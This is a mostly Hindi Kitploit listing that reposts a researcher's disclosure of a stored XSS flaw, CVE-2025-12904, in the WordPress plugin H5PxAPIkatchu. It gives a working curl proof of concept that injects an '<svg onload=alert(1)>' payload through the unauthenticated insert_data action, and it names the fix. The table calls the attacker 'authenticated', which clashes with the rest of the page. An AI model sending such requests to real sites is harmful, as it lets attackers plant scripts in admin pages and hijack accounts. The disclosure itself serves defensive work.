Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SNORDIAN-s-H5PxAPIkatchu-CVE-Report — Disclosure for CVE-2025-12904 | Kitploit
उपकरण/GitHubGitHub/mooseloveti/snordian-s-h5pxapikatchu-cve-report
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubmooseloveti/snordian-s-h5pxapikatchu-cve-report

SNORDIAN-s-H5PxAPIkatchu-CVE-Report

Disclosure for CVE-2025-12904

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
8 महीने पहलेअभी तक समीक्षित नहीं

SNORDIAN-H5PxAPIkatchu-CVE-रिपोर्ट

CVE-2025-12904 का प्रकटीकरण

CVE-2025-12904 - SNORDIAN's H5PxAPIkatchu में भेद्यता

यह रिपॉजिटरी SNORDIAN's H5PxAPIkatchu <= 0.4.16,वर्डप्रेस प्लगइन जिसे otacke ने विकसित किया है, में पाई गई एक भेद्यता का खुलासा करता है।

🛠 प्रभावित संस्करण

  • उत्पाद: SNORDIAN's H5PxAPIkatchu
  • संस्करण: v0.4.16
  • URL: https://wordpress.org/plugins/h5pxapikatchu/

🔒 निर्धारित CVE

CVE IDप्रकारघटकप्रभाव
CVE-2025-12904insert_data के माध्यम से अप्रमाणित संग्रहीत क्रॉस-साइट स्क्रिप्टिंगclass-table-view.phpप्रमाणित हमलावर JS निष्पादित कर सकता है

🧾 विस्तृत विवरण

CVE-2025-12904 — insert_data के माध्यम से अप्रमाणित संग्रहीत क्रॉस-साइट स्क्रिप्टिंग

  • प्रभावित घटक: h5pxapikatchu एडमिन पेज
  • आक्रमण वेक्टर: POST अनुरोध के माध्यम से अप्रमाणित
  • ट्रिगर: एक हमलावर मनमानी स्क्रिप्ट संग्रहीत करने के लिए insert_data क्रिया का शोषण करके एडमिन इंटरफेस में दुर्भावनापूर्ण स्क्रिप्ट इंजेक्ट कर सकता है।
root@kitploit:~
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=insert_data' \
  --data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

※यदि ऑब्जेक्ट के अंदर का id मौजूद नहीं है, तो यह विफल हो जाएगा।

  • प्रभाव: संग्रहीत स्क्रिप्ट निष्पादित हो सकती हैं, जिससे खाता अपहरण जैसी गंभीर हानि का जोखिम हो सकता है।

❓भेद्यता का कारण

insert_data() फ़ंक्शन ने कोई अनुमति जांच नहीं की, जिससे बिना प्रमाणीकरण के दुर्भावनापूर्ण इनपुट सहेजा जा सका। इसके अलावा, ये प्रविष्टियाँ प्रशासन इंटरफ़ेस पर बिना एस्केप किए प्रदर्शित की गईं।

  • insert_data() फ़ंक्शन अनधिकृत निष्पादन को रोकने के लिए current_user_can का उपयोग करता है।
  • echo $value के बजाय esc_html($value) का उपयोग करके, आप XSS निष्पादन को रोक सकते हैं।

ひとこと

PoC बनाना बहुत कठिन था।

root@kitploit:~
--data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

इस भाग को दोहराने में बहुत समय लगा। curl कमांड को और अधिक कुशलता से उपयोग करना सीखना चाहता हूँ। और यह प्लगइन... क्या सब ठीक है? खासकर नाम, और वैसे भी, सा।

🔍 खोजकर्ता

नाम: MooseLove
भूमिका: स्वतंत्र सुरक्षा शोधकर्ता / बग हंटर
संपर्क: अनुरोध पर उपलब्ध


📚 संदर्भ

  • उत्पाद: https://wordpress.org/plugins/h5pxapikatchu/

⚠️ लाइसेंस

यह सलाह सार्वजनिक सुरक्षा जागरूकता के लिए प्रदान की गई है। श्रेय सहित साझा करने के लिए स्वतंत्र।

टूल डाउनलोड करें